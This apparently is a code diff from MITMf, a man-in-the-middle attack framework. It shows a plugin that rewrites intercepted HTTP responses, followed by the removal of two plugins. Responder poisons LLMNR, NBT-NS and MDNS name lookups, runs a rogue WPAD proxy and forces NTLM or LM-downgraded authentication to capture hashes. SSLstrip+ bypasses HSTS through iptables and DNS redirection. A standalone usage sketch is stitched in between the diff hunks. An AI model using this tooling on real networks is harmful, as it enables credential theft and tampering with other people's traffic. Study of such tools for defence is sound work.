def handleResponse(self, request, data):
ip, hn, mime = self._get_req_info(request)
if self._should_replace(ip, hn, mime):
if self.search_str is not None and self.search_str != "":
data = data.replace(self.search_str, self.replace_str)
mitmf_logger.info("%s [%s] Replaced '%s' with '%s'" % (request.client.getClientIP(), request.headers['host'], self.search_str, self.replace_str))
# Did the user provide us with a regex file?
for regex in self.regexes:
try:
data = re.sub(regex[0], regex[1], data)
mitmf_logger.info("%s [%s] Occurances matching '%s' replaced with '%s'" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
except Exception:
logging.error("%s [%s] Your provided regex (%s) or replace value (%s) is empty or invalid. Please debug your provided regex(es)" % (request.client.getClientIP(), request.headers['host'], regex[0], regex[1]))
self.ctable[ip] = time.time()
self.dtable[ip+hn] = True
return {'request': request, 'data': data}
return
def add_options(self, options):
options.add_argument("--search-str", type=str, default=None, help="String you would like to replace --replace-str with. Default: '' (empty string)")
options.add_argument("--replace-str", type=str, default="", help="String you would like to replace.")
options.add_argument("--regex-file", type=file, help="Load file with regexes. File format: <regex1>[tab]<regex2>[new-line]")
options.add_argument("--keep-cache", action="store_true", help="Don't kill the server/client caching.")
def _should_replace(self, ip, hn, mime):
return mime.find(self.mime) != -1
def _get_req_info(self, request):
ip = request.client.getClientIP()
hn = request.client.getRequestHostname()
mime = request.client.headers['Content-Type']
return (ip, hn, mime)
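
A small sketch of the --regex-file format described in add_options, with hypothetical rules, assuming one tab-separated pattern/replacement pair per line:

import re

# Hypothetical contents of a --regex-file: "<pattern><TAB><replacement>" per line.
rules_text = "Hello\tGoodbye\n</title>\t - intercepted</title>\n"
regexes = [line.split("\t") for line in rules_text.splitlines() if line.strip()]

body = "<title>Hello</title><p>Hello world</p>"
for pattern, replacement in regexes:
    body = re.sub(pattern, replacement, body)
print(body)   # <title>Goodbye - intercepted</title><p>Goodbye world</p>
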


@@ -1,73 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import sys
import os
import threading
from plugins.plugin import Plugin
from libs.responder.Responder import ResponderMITMf
from core.sslstrip.DnsCache import DnsCache
from twisted.internet import reactor
class Responder(Plugin):
name = "Responder"
optname = "responder"
desc = "Poison LLMNR, NBT-NS and MDNS requests"
tree_output = ["NBT-NS, LLMNR & MDNS Responder v2.1.2 by Laurent Gaffie online"]
version = "0.2"
has_opts = True
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.interface = options.interface
try:
config = options.configfile['Responder']
except Exception, e:
sys.exit('[-] Error parsing config for Responder: ' + str(e))
if options.Analyse:
self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
resp = ResponderMITMf()
resp.setCoreVars(options, config)
result = resp.AnalyzeICMPRedirect()
if result:
for line in result:
self.tree_output.append(line)
resp.printDebugInfo()
resp.start()
def plugin_reactor(self, strippingFactory):
reactor.listenTCP(3141, strippingFactory)
def add_options(self, options):
options.add_argument('--analyze', dest="Analyse", action="store_true", help="Allows you to see which workstation is sending NBT-NS, BROWSER and LLMNR requests to which workstation, without poisoning anything")
options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")
options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")
options.add_argument('--fingerprint', dest="Finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query")
options.add_argument('--wpad', dest="WPAD_On_Off", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False")
options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False")


@@ -1,56 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import sys
import logging
from plugins.plugin import Plugin
from core.utils import IpTables
from core.sslstrip.URLMonitor import URLMonitor
from libs.dnschef.dnschef import DNSChef
class HSTSbypass(Plugin):
name = 'SSLstrip+'
optname = 'hsts'
desc = 'Enables SSLstrip+ for partial HSTS bypass'
version = "0.4"
tree_output = ["SSLstrip+ by Leonardo Nve running"]
has_opts = False
def initialize(self, options):
self.options = options
self.manualiptables = options.manualiptables
try:
hstsconfig = options.configfile['SSLstrip+']
except Exception, e:
sys.exit("[-] Error parsing config for SSLstrip+: " + str(e))
if not options.manualiptables:
if IpTables.getInstance().dns is False:
IpTables.getInstance().DNS(options.ip_address, options.configfile['MITMf']['DNS']['port'])
URLMonitor.getInstance().setHstsBypass(hstsconfig)
DNSChef.getInstance().setHstsBypass(hstsconfig)
def finish(self):
if not self.manualiptables:
if IpTables.getInstance().dns is True:
IpTables.getInstance().Flush()

Some files were not shown because too many files have changed in this diff.